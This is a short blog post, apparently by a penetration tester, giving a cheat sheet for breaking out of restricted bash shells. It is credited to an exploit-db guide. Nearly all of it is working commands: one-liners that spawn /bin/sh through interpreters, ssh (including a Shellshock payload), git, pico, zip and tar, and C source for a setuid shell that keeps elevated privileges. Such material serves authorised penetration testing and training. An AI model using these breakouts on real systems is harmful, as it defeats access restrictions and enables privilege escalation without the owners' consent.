---
layout: post
title: "rbash breakout cheat sheet"
tags: pt
---
shamelessly plugged from [exploit-db](https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf)
  

basic:
```
1) From except > except spawn sh then sh.
2) From python > python -c 'import os; os.system("/bin/sh")'
3) From php > php -a then exec("sh -i");
4) From perl > perl -e 'exec "/bin/sh";'
5) From lua > os.execute('/bin/sh').
6) From ruby > exec "/bin/sh"
```
advanced:
```
1)From ssh > ssh username@IP -t "/bin/sh" or "/bin/bash"
2)From ssh2 > ssh username@IP -t "bash --noprofile"
3)From ssh3 > ssh username@IP -t "() { :; }; /bin/bash" (shellshock)
4)From ssh4 > ssh -o ProxyCommand="sh -c /tmp/yourfile.sh" 127.0.0.1 (SUID)
5)From git > git help status > you can run it then !/bin/bash
6)From pico > pico -s "/bin/bash" then you can write /bin/bash and then CTRL + T
7)From zip > zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
8)From tar > tar cf /dev/null testfile --checkpoint=1 --checkpointaction=exec=/bin/bash
```
c setuid shell:
```c
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
    setresgid(getegid(), getegid(), getegid());
    setresuid(geteuid(), geteuid(), geteuid());

    execve("/bin/sh", argv, envp);
    return 0;
}
```
